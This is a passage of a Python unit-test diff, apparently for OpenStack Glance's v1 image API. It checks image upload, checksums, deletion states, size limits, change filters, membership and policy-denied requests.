webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""pending_delete"", res.headers['x-image-meta-status']) + + # Second deletion + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + self.assertTrue('Forbidden to delete a pending_delete image' + in res.body) + + # Verify the status is still pending_delete + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEqual(""pending_delete"", res.headers['x-image-meta-status']) + + def test_register_and_upload(self): + """""" + Test that the process of registering an image with + some metadata, then uploading an image file with some + more metadata doesn't mark the original metadata deleted + :see LP Bug#901534 + """""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-property-key1': 'value1'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + res_body = json.loads(res.body)['image'] + + self.assertTrue('id' in res_body) + + image_id = res_body['id'] + self.assertTrue('/images/%s' % image_id in res.headers['location']) + + # Verify the status is queued + self.assertTrue('status' in res_body) + self.assertEqual('queued', res_body['status']) + + # Check properties are not deleted + self.assertTrue('properties' in res_body) + self.assertTrue('key1' in res_body['properties']) + self.assertEqual('value1', res_body['properties']['key1']) + + # Now upload the image file along with some more + # metadata and verify original metadata properties + # are not marked deleted + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['Content-Type'] = 'application/octet-stream' + req.headers['x-image-meta-property-key2'] = 'value2' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the status is queued + req = webob.Request.blank(""/images/%s"" % 
image_id) + req.method = 'HEAD' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertTrue('x-image-meta-property-key1' in res.headers, + ""Did not find required property in headers. "" + ""Got headers: %r"" % res.headers) + self.assertEqual(""active"", res.headers['x-image-meta-status']) + + def test_disable_purge_props(self): + """""" + Test the special x-glance-registry-purge-props header controls + the purge property behaviour of the registry. + :see LP Bug#901534 + """""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-property-key1': 'value1'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = ""chunk00000remainder"" + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + res_body = json.loads(res.body)['image'] + + self.assertTrue('id' in res_body) + + image_id = res_body['id'] + self.assertTrue('/images/%s' % image_id in res.headers['location']) + + # Verify the status is queued + self.assertTrue('status' in res_body) + self.assertEqual('active', res_body['status']) + + # Check properties are not deleted + self.assertTrue('properties' in res_body) + self.assertTrue('key1' in res_body['properties']) + self.assertEqual('value1', res_body['properties']['key1']) + + # Now update the image, setting new properties without + # passing the x-glance-registry-purge-props header and + # verify that original properties are marked deleted. + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-property-key2'] = 'value2' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the original property no longer in headers + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'HEAD' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertTrue('x-image-meta-property-key2' in res.headers, + ""Did not find required property in headers. "" + ""Got headers: %r"" % res.headers) + self.assertFalse('x-image-meta-property-key1' in res.headers, + ""Found property in headers that was not expected. "" + ""Got headers: %r"" % res.headers) + + # Now update the image, setting new properties and + # passing the x-glance-registry-purge-props header with + # a value of ""false"" and verify that second property + # still appears in headers. + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + req.headers['x-image-meta-property-key3'] = 'value3' + req.headers['x-glance-registry-purge-props'] = 'false' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + # Verify the second and third property in headers + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'HEAD' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertTrue('x-image-meta-property-key2' in res.headers, + ""Did not find required property in headers. "" + ""Got headers: %r"" % res.headers) + self.assertTrue('x-image-meta-property-key3' in res.headers, + ""Did not find required property in headers. 
"" + ""Got headers: %r"" % res.headers) + + def test_publicize_image_unauthorized(self): + """"""Create a non-public image then fail to make public"""""" + rules = {""add_image"": '@', ""publicize_image"": '!'} + self.set_policy_rules(rules) + + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-is-public': 'false', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'PUT' + req.headers['x-image-meta-is-public'] = 'true' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_update_image_size_header_too_big(self): + """"""Tests raises BadRequest for supplied image size that is too big"""""" + fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1} + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'PUT' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_update_image_size_data_too_big(self): + self.config(image_size_cap=512) + + fixture_headers = {'content-type': 'application/octet-stream'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'PUT' + + req.body = 'X' * (CONF.image_size_cap + 1) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_update_image_size_chunked_data_too_big(self): + self.config(image_size_cap=512) + + # Create new image that has no data + req = webob.Request.blank(""/images"") + req.method = 'POST' + req.headers['x-image-meta-name'] = 'something' + req.headers['x-image-meta-container_format'] = 'ami' + req.headers['x-image-meta-disk_format'] = 'ami' + res = req.get_response(self.api) + image_id = json.loads(res.body)['image']['id'] + + fixture_headers = { + 'content-type': 'application/octet-stream', + 'transfer-encoding': 'chunked', + } + req = webob.Request.blank(""/images/%s"" % image_id) + req.method = 'PUT' + + req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1)) + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 413) + + def test_update_non_existing_image(self): + self.config(image_size_cap=100) + + req = webob.Request.blank(""images/%s"" % _gen_uuid) + req.method = 'PUT' + req.body = 'test' + req.headers['x-image-meta-name'] = 'test' + req.headers['x-image-meta-container_format'] = 'ami' + req.headers['x-image-meta-disk_format'] = 'ami' + req.headers['x-image-meta-is_public'] = 'False' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 404) + + def test_update_public_image(self): + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-is-public': 'true', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + req = 
webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'PUT' + req.headers['x-image-meta-name'] = 'updated public image' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + def test_get_index_sort_name_asc(self): + """""" + Tests that the /images registry API returns list of + public images sorted alphabetically by name in + ascending order. + """""" + UUID3 = _gen_uuid() + extra_fixture = {'id': UUID3, + 'status': 'active', + 'is_public': True, + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'name': 'asdf', + 'size': 19, + 'checksum': None} + + db_api.image_create(self.context, extra_fixture) + + UUID4 = _gen_uuid() + extra_fixture = {'id': UUID4, + 'status': 'active', + 'is_public': True, + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'name': 'xyz', + 'size': 20, + 'checksum': None} + + db_api.image_create(self.context, extra_fixture) + + req = webob.Request.blank('/images?sort_key=name&sort_dir=asc') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + + images = res_dict['images'] + self.assertEquals(len(images), 3) + self.assertEquals(images[0]['id'], UUID3) + self.assertEquals(images[1]['id'], UUID2) + self.assertEquals(images[2]['id'], UUID4) + + def test_get_details_filter_changes_since(self): + """""" + Tests that the /images/detail registry API returns list of + public images that have a size less than or equal to size_max + """""" + dt1 = timeutils.utcnow() - datetime.timedelta(1) + iso1 = timeutils.isotime(dt1) + + date_only1 = dt1.strftime('%Y-%m-%d') + date_only2 = dt1.strftime('%Y%m%d') + date_only3 = dt1.strftime('%Y-%m%d') + + dt2 = timeutils.utcnow() + datetime.timedelta(1) + iso2 = timeutils.isotime(dt2) + + image_ts = timeutils.utcnow() + datetime.timedelta(2) + hour_before = image_ts.strftime('%Y-%m-%dT%H:%M:%S%%2B01:00') + hour_after = image_ts.strftime('%Y-%m-%dT%H:%M:%S-01:00') + + dt4 = timeutils.utcnow() + datetime.timedelta(3) + iso4 = timeutils.isotime(dt4) + + UUID3 = _gen_uuid() + extra_fixture = {'id': UUID3, + 'status': 'active', + 'is_public': True, + 'disk_format': 'vhd', + 'container_format': 'ovf', + 'name': 'fake image #3', + 'size': 18, + 'checksum': None} + + db_api.image_create(self.context, extra_fixture) + db_api.image_destroy(self.context, UUID3) + + UUID4 = _gen_uuid() + extra_fixture = {'id': UUID4, + 'status': 'active', + 'is_public': True, + 'disk_format': 'ami', + 'container_format': 'ami', + 'name': 'fake image #4', + 'size': 20, + 'checksum': None, + 'created_at': image_ts, + 'updated_at': image_ts} + + db_api.image_create(self.context, extra_fixture) + + # Check a standard list, 4 images in db (2 deleted) + req = webob.Request.blank('/images/detail') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 2) + self.assertEqual(images[0]['id'], UUID4) + self.assertEqual(images[1]['id'], UUID2) + + # Expect 3 images (1 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % iso1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 3) + self.assertEqual(images[0]['id'], UUID4) + self.assertEqual(images[1]['id'], UUID3) # deleted + self.assertEqual(images[2]['id'], UUID2) + + # Expect 1 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % iso2) + res 
= req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 1) + self.assertEqual(images[0]['id'], UUID4) + + # Expect 1 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % + hour_before) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 1) + self.assertEqual(images[0]['id'], UUID4) + + # Expect 0 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % + hour_after) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 0) + + # Expect 0 images (0 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % iso4) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 0) + + for param in [date_only1, date_only2, date_only3]: + # Expect 3 images (1 deleted) + req = webob.Request.blank('/images/detail?changes-since=%s' % + param) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + images = res_dict['images'] + self.assertEquals(len(images), 3) + self.assertEqual(images[0]['id'], UUID4) + self.assertEqual(images[1]['id'], UUID3) # deleted + self.assertEqual(images[2]['id'], UUID2) + + # Bad request (empty changes-since param) + req = webob.Request.blank('/images/detail?changes-since=') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_get_images_bad_urls(self): + """"""Check that routes collections are not on (LP bug 1185828)"""""" + req = webob.Request.blank('/images/detail.xxx') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + req = webob.Request.blank('/images.xxx') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + req = webob.Request.blank('/images/new') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + req = webob.Request.blank(""/images/%s/members"" % UUID1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank(""/images/%s/members.xxx"" % UUID1) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_get_images_detailed_unauthorized(self): + rules = {""get_images"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank('/images/detail') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_get_images_unauthorized(self): + rules = {""get_images"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank('/images/detail') + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_store_location_not_revealed(self): + """""" + Test that the internal store location is NOT revealed + through the API server + """""" + # Check index and details... 
+ for url in ('/images', '/images/detail'): + req = webob.Request.blank(url) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + res_dict = json.loads(res.body) + + images = res_dict['images'] + num_locations = sum([1 for record in images + if 'location' in record.keys()]) + self.assertEquals(0, num_locations, images) + + # Check GET + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertFalse('X-Image-Meta-Location' in res.headers) + + # Check HEAD + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertFalse('X-Image-Meta-Location' in res.headers) + + # Check PUT + req = webob.Request.blank(""/images/%s"" % UUID2) + req.body = res.body + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + res_body = json.loads(res.body) + self.assertFalse('location' in res_body['image']) + + # Check POST + req = webob.Request.blank(""/images"") + headers = {'x-image-meta-location': 'http://localhost', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + for k, v in headers.iteritems(): + req.headers[k] = v + req.method = 'POST' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 201) + res_body = json.loads(res.body) + self.assertFalse('location' in res_body['image']) + + def test_image_is_checksummed(self): + """"""Test that the image contents are checksummed properly"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + image_contents = ""chunk00000remainder"" + image_checksum = hashlib.md5(image_contents).hexdigest() + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = image_contents + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals(image_checksum, res_body['checksum'], + ""Mismatched checksum. Expected %s, got %s"" % + (image_checksum, res_body['checksum'])) + + def test_etag_equals_checksum_header(self): + """"""Test that the ETag header matches the x-image-meta-checksum"""""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + image_contents = ""chunk00000remainder"" + image_checksum = hashlib.md5(image_contents).hexdigest() + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = image_contents + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + image = json.loads(res.body)['image'] + + # HEAD the image and check the ETag equals the checksum header... 
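+ # Editor's sketch (assumption, not from the original test): since the + # v1 API sets the ETag to the image's md5 checksum, a client can + # verify a download end-to-end with: + # hashlib.md5(res.body).hexdigest() == res.headers['etag']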
+ expected_headers = {'x-image-meta-checksum': image_checksum, + 'etag': image_checksum} + req = webob.Request.blank(""/images/%s"" % image['id']) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + for key in expected_headers.keys(): + self.assertTrue(key in res.headers, + ""required header '%s' missing from "" + ""returned headers"" % key) + for key, value in expected_headers.iteritems(): + self.assertEquals(value, res.headers[key]) + + def test_bad_checksum_prevents_image_creation(self): + """"""Test that a bad client-supplied checksum prevents image creation"""""" + image_contents = ""chunk00000remainder"" + bad_checksum = hashlib.md5(""invalid"").hexdigest() + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-checksum': bad_checksum, + 'x-image-meta-is-public': 'true'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + + req.headers['Content-Type'] = 'application/octet-stream' + req.body = image_contents + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + # Verify that only the one pre-existing image is listed, i.e. the + # rejected upload did not create an image + req = webob.Request.blank(""/images"") + req.method = 'GET' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + images = json.loads(res.body)['images'] + self.assertEqual(len(images), 1) + + def test_image_meta(self): + """"""Test for HEAD /images/<ID>"""""" + expected_headers = {'x-image-meta-id': UUID2, + 'x-image-meta-name': 'fake image #2'} + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + for key, value in expected_headers.iteritems(): + self.assertEquals(value, res.headers[key]) + + def test_image_meta_unauthorized(self): + rules = {""get_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_show_image_basic(self): + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(res.content_type, 'application/octet-stream') + self.assertEqual('chunk00000remainder', res.body) + + def test_show_non_exists_image(self): + req = webob.Request.blank(""/images/%s"" % _gen_uuid()) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_show_image_unauthorized(self): + rules = {""get_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 403) + + def test_show_image_unauthorized_download(self): + rules = {""download_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + res = req.get_response(self.api) + self.assertEqual(res.status_int, 403) + + def test_delete_image(self): + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.body, '') + + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404, + res.body) + + req =
webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.headers['x-image-meta-deleted'], 'True') + self.assertEquals(res.headers['x-image-meta-status'], 'deleted') + + def test_delete_non_exists_image(self): + req = webob.Request.blank(""/images/%s"" % _gen_uuid()) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_delete_not_allowed(self): + # Verify we can get the image data + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'GET' + req.headers['X-Auth-Token'] = 'user:tenant:' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(len(res.body), 19) + + # Verify we cannot delete the image + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 403) + + # Verify the image data is still there + req.method = 'GET' + res = req.get_response(self.api) + self.assertEqual(res.status_int, 200) + self.assertEqual(len(res.body), 19) + + def test_delete_queued_image(self): + """"""Delete an image in a queued state + + Bug #747799 demonstrated that trying to DELETE an image + that had had its save process killed manually results in failure + because the location attribute is None. + + Bug #1048851 demonstrated that the status was not properly + being updated to 'deleted' from 'queued'. + """""" + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + + # Now try to delete the image... + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s' % res_body['id']) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.headers['x-image-meta-deleted'], 'True') + self.assertEquals(res.headers['x-image-meta-status'], 'deleted') + + def test_delete_queued_image_delayed_delete(self): + """"""Delete an image in a queued state when delayed_delete is on + + Bug #1048851 demonstrated that the status was not properly + being updated to 'deleted' from 'queued'. + """""" + self.config(delayed_delete=True) + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-name': 'fake image #3'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + + # Now try to delete the image... 
+ req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s' % res_body['id']) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(res.headers['x-image-meta-deleted'], 'True') + self.assertEquals(res.headers['x-image-meta-status'], 'deleted') + + def test_delete_protected_image(self): + fixture_headers = {'x-image-meta-store': 'file', + 'x-image-meta-name': 'fake image #3', + 'x-image-meta-disk-format': 'vhd', + 'x-image-meta-container-format': 'ovf', + 'x-image-meta-protected': 'True'} + + req = webob.Request.blank(""/images"") + req.method = 'POST' + for k, v in fixture_headers.iteritems(): + req.headers[k] = v + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + res_body = json.loads(res.body)['image'] + self.assertEquals('queued', res_body['status']) + + # Now try to delete the image... + req = webob.Request.blank(""/images/%s"" % res_body['id']) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_delete_image_unauthorized(self): + rules = {""delete_image"": '!'} + self.set_policy_rules(rules) + req = webob.Request.blank(""/images/%s"" % UUID2) + req.method = 'DELETE' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + + def test_get_details_invalid_marker(self): + """""" + Tests that the /images/detail registry API returns a 400 + when an invalid marker is provided + """""" + req = webob.Request.blank('/images/detail?marker=%s' % _gen_uuid()) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_get_image_members(self): + """""" + Tests members listing for existing images + """""" + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + memb_list = json.loads(res.body) + num_members = len(memb_list['members']) + self.assertEquals(num_members, 0) + + def test_get_image_members_allowed_by_policy(self): + rules = {""get_members"": '@'} + self.set_policy_rules(rules) + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + memb_list = json.loads(res.body) + num_members = len(memb_list['members']) + self.assertEquals(num_members, 0) + + def test_get_image_members_forbidden_by_policy(self): + rules = {""get_members"": '!'} + self.set_policy_rules(rules) + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code) + + def test_get_image_members_not_existing(self): + """""" + Tests proper exception is raised if attempt to get members of + non-existing image + """""" + req = webob.Request.blank('/images/%s/members' % _gen_uuid()) + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_add_member(self): + """""" + Tests adding image members + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + req = webob.Request.blank('/images/%s/members/test' % UUID2) + req.method = 'PUT' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 201) + + def 
test_get_member_images(self): + """""" + Tests image listing for members + """""" + req = webob.Request.blank('/shared-images/pattieblack') + req.method = 'GET' + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + memb_list = json.loads(res.body) + num_members = len(memb_list['shared_images']) + self.assertEquals(num_members, 0) + + def test_replace_members(self): + """""" + Tests replacing image members raises right exception + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=False) + fixture = dict(member_id='pattieblack') + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(image_memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 401) + + def test_active_image_immutable_props_for_user(self): + """""" + Tests user cannot update immutable props of active image + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=False) + fixture_header_list = [{'x-image-meta-checksum': '1234'}, + {'x-image-meta-size': '12345'}] + for fixture_header in fixture_header_list: + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'PUT' + for k, v in fixture_header.iteritems(): + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + orig_value = res.headers[k] + + req = webob.Request.blank('/images/%s' % UUID2) + req.headers[k] = v + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 403) + prop = k[len('x-image-meta-'):] + self.assertNotEqual(res.body.find(""Forbidden to modify \'%s\' "" + ""of active "" + ""image"" % prop), -1) + + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(orig_value, res.headers[k]) + + def test_props_of_active_image_mutable_for_admin(self): + """""" + Tests admin can update 'immutable' props of active image + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + fixture_header_list = [{'x-image-meta-checksum': '1234'}, + {'x-image-meta-size': '12345'}] + for fixture_header in fixture_header_list: + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'PUT' + for k, v in fixture_header.iteritems(): + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + orig_value = res.headers[k] + + req = webob.Request.blank('/images/%s' % UUID2) + req.headers[k] = v + req.method = 'PUT' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + + req = webob.Request.blank('/images/%s' % UUID2) + req.method = 'HEAD' + res = req.get_response(self.api) + self.assertEquals(res.status_int, 200) + self.assertEquals(v, res.headers[k]) + + def test_replace_members_non_existing_image(self): + """""" + Tests replacing image members raises right exception + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + fixture = dict(member_id='pattieblack') + req = webob.Request.blank('/images/%s/members' % _gen_uuid()) + req.method = 'PUT' + req.content_type = 'application/json' 
+ req.body = json.dumps(dict(image_memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 404) + + def test_replace_members_bad_request(self): + """""" + Tests replacing image members raises bad request if body is wrong + """""" + test_router_api = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router_api, is_admin=True) + fixture = dict(member_id='pattieblack') + + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(image_memberships=fixture)) + + res = req.get_response(self.api) + self.assertEquals(res.status_int, 400) + + def test_replace_members_positive(self): + """""" + Tests replacing image members + """""" + test_router = router.API(self.mapper) + self.api = test_utils.FakeAuthMiddleware( + test_router, is_admin=True) + + fixture = [dict(member_id='pattieblack', can_share=False)] + # Replace + req = webob.Request.blank('/images/%s/members' % UUID2) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + res = req.get_response(self.api) + self.assertEquals(res.status_int, 204) + + def test_replace_members_forbidden_by_policy(self): + rules = {""modify_member"": '!'} + self.set_policy_rules(rules) + self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper), + is_admin=True) + fixture = [{'member_id': 'pattieblack', 'can_share': 'false'}] + + req = webob.Request.blank('/images/%s/members' % UUID1) + req.method = 'PUT' + req.content_type = 'application/json' + req.body = json.dumps(dict(memberships=fixture)) + + res = req.get_response(self.api) + 